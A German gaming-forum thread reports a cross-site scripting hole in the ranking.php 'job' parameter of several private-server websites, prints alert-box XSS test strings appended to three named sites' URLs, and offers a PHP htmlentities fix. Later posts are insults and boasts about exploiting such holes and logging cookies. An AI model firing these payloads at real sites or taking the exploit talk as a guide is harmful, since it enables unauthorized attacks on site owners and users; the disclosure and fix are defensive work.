[Hinweis] XSS-Lücke in Surako's Websites

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • [Hinweis] XSS-Lücke in Surako's Websites

      Guten Abend liebe MCoreCommunity,

      ich wollte euch nur drauf hinweisen, das in sämtlichen Homepages von Stefan Pfeifer (Surako) eine XSS-Lücke besteht.

      Diese befindet sich im Ranking:

      /ranking.php?job=

      Ich habe Stefan drauf hingewiesen, aber anscheinend wurden noch nicht alle Kunden informiert.

      Hier als Beispiel:
      Revolution of Fire:

      Quellcode

      1. http://revolution-of-fire.eu/ranking.php?job=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>

      Und:
      Legends of Ardunia

      Quellcode

      1. http://www.legendsofardunia.de/ranking.php?job=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>


      Quellcode

      1. http://sapphire-flyff.de/ranking.php?job=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))


      Bis auf die Website von Insanity Flyff sind alle Websites vom ihm betroffen.
      Ich empfehle euch es zu fixen.
      MfG
    • Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )

    • Fix

      Folgendes in der Ranking Datei suchen:

      PHP-Quellcode

      1. if(isset($_GET['job']) && !empty($_GET['job'])) {
      2. echo '<option value="'.$_GET['job'].'">'.getjob($_GET['job']).'</option>';
      3. }


      und mit folgendem Code ersetzen:

      PHP-Quellcode

      1. if(isset($_GET['job']) && !empty($_GET['job'])) {
      2. echo '<option value="'.htmlentities($_GET['job']).'">'.htmlentities(getjob($_GET['job'])).'</option>';
      3. }
    • Ich finds geil, du Postest ne XSS Lücke ( Die du netmal selbst gefunden hast ) anstat die knall hart aus zu nutzen..

      Würdest du auf Offi HP eine Lücke Finden ( eFlyff hat eine im Login ), würdest du bestimmt keine Mail schreiben und sagen "Ey ihr habt ne Lücke ufer HP", sondern würdest sie Ausnutzen, also was soll das ganze hier?

      Willst Fame? Thanks?..

      Sorry aber ich rall net why.
    • Ich finds geil, du Postest ne XSS Lücke ( Die du netmal selbst gefunden hast ) anstat die knall hart aus zu nutzen..

      1. Ich hab sie selber gefunden, also STFU
      Würdest du auf Offi HP eine Lücke Finden ( eFlyff hat eine im Login ), würdest du bestimmt keine Mail schreiben und sagen "Ey ihr habt ne Lücke ufer HP", sondern würdest sie Ausnutzen, also was soll das ganze hier?


      Offi ist was anderes, kannst nicht mit ner Community die sich "eigentlich" gegenseitig helfen sollte, vergleichen.


      Willst Fame? Thanks?..


      Ich will das solche Kiddies wie du nicht auf dumme Gedanken kommen.

      Und die XSS-Lücke hier auf M-Core, die hab ich vorhin durch Zufall entdeckt, [ironie on]hm ich glaub ich nutzt sie aus damit ich M-Core kaputt mach[/ironie off]
    • dennisdra;279026 schrieb:

      1. Ich hab sie selber gefunden, also STFU


      Offi ist was anderes, kannst nicht mit ner Community die sich "eigentlich" gegenseitig helfen sollte, vergleichen.



      Ich will das solche Kiddies wie du nicht auf dumme Gedanken kommen.

      Und die XSS-Lücke hier auf M-Core, die hab ich vorhin durch Zufall entdeckt, [ironie on]hm ich glaub ich nutzt sie aus damit ich M-Core kaputt mach[/ironie off]


      Naja, finds nur Komisch das einer, der im Source soviel Hirn hat wie Yannick, und echt nichts ohne Hilfe schafft, ne XSS Lücke findet.

      Un jemand wie ich auf Dumme Ideen? Klar, ich kann ja soviel mit Anfangen P Server Down zu legen, würd ich das wirklich wollen, hät ich euch auf so manche SQL Lücke in der Source bereits hingewiesen, also Fresse, k?

      Finds nur echt ken Sinn.

      @Extension: Suchen?..
    • Extension;279030 schrieb:

      @Crasy Ja das weiß ich, aber wie? Gibt es dafür bestimmte Tools?


      Naja, mehr Testen, wobei Stefans HP teilweiße alle Public sind iwo, dann hast ja praktisch den "Source" davon und kanst so auch Lücken finden indem du nach Fehlern suchst.
    • <ragemode>@Crasy: Könntest du ein EINZIGES Mal deinen Mund mit dem Scheiß von wegen "ICH BIN GOOOOOOTTT ÜBERPROOOO 1337" lassen? Du musst doch echt nur schräge Gedanken haben, dass du die ganze Zeit auf anderen Leuten rumhacken musst und ihnen einreden musst, dass sie minderwertig wären...</ragemode>
    • Killerooo;279038 schrieb:

      Acunetix, es gibt keine lücke im eflyff login und der src hat auch keine sql lücken mehr.
      Die einzige die bekannt war wurd gefixxt und der fixx releast.


      Gibt es, schau selbst. :)

      Ach, und ich Gott? Rofl, ich würd mich ohne paar leute mit dem Scheiß netmal beschäftigen, ilold.

      Ich Schreibe meist nur Darunter, weil ich es einfach nur Crap Finde was machen, und hab ich jemals behauptet das ich "Gott" bin? ne? ey sorry aber wenn ihr euer Hirn nicht mal Logisch einsetzen könnt, sorry aber tut ihr mir leid, das hat nichts damit zutun das ich x weiß oder so, frag mich mal iwas anderes als das, und ich geb dir ne Antwort die Falsch ist, bzw ich will damit sagen: TUT MIR LEID DAS ICH MICH MIT DEM GEBIET BESCHÄFTIGE ALS WIE DEN GANZEN TAG ÜBERALL MAL RUM ZU SCHWIRREN.

      Hi. :)
    • naja crasy es ist nicht auf allgemein gpotato.eu es ist auf gpotato.com aber die bringt einem eh nichts weil die nur eght wenn man ausgeloggt ist also ist cookie loggen eigentlich sinnlos , (wenn du beweise willst das ich die xss kenne pm mich ich schick dir gerne screen und hust habe auch xss bei lg nasa nike puma und sonstiges und schon paar firmen welche gemeldet...^^ und die von gpotato zufinden war am einfachsten:) )
      regards
    • Crasy;279028 schrieb:

      Naja, finds nur Komisch das einer, der im Source soviel Hirn hat wie Yannick, und echt nichts ohne Hilfe schafft, ne XSS Lücke findet.

      Un jemand wie ich auf Dumme Ideen? Klar, ich kann ja soviel mit Anfangen P Server Down zu legen, würd ich das wirklich wollen, hät ich euch auf so manche SQL Lücke in der Source bereits hingewiesen, also Fresse, k?

      Finds nur echt ken Sinn.

      @Extension: Suchen?..




      er hat die lücke bei mir auf der hp als erstes gefunden, kurz dannach bekamm ich nen bild zu sehen von ihm mit ner Xss lücke hier im Forum. ;)

      Also soviel zu er hats nicht selber gefunden.


      Hier gefunden von Dennisdra

    • Crasy;279028 schrieb:

      Naja, finds nur Komisch das einer, der im Source soviel Hirn hat wie Yannick, und echt nichts ohne Hilfe schafft, ne XSS Lücke findet.


      Brauch man kein Brain, war mir lange bekannt und ich habs auch hin und wieder genutzt.

      Crasy;279028 schrieb:


      Un jemand wie ich auf Dumme Ideen? Klar, ich kann ja soviel mit Anfangen P Server Down zu legen, würd ich das wirklich wollen, hät ich euch auf so manche SQL Lücke in der Source bereits hingewiesen, also Fresse, k?

      Finds nur echt ken Sinn.

      @Extension: Suchen?..


      Schwachsinn, es gab eine bei der du mehr als 16 Chr zur Verfügung hattest, die ist public, es gibt noch
      3 weitere, aber da bekommst du nichts injectet weil selbst die Statements zu lang wären.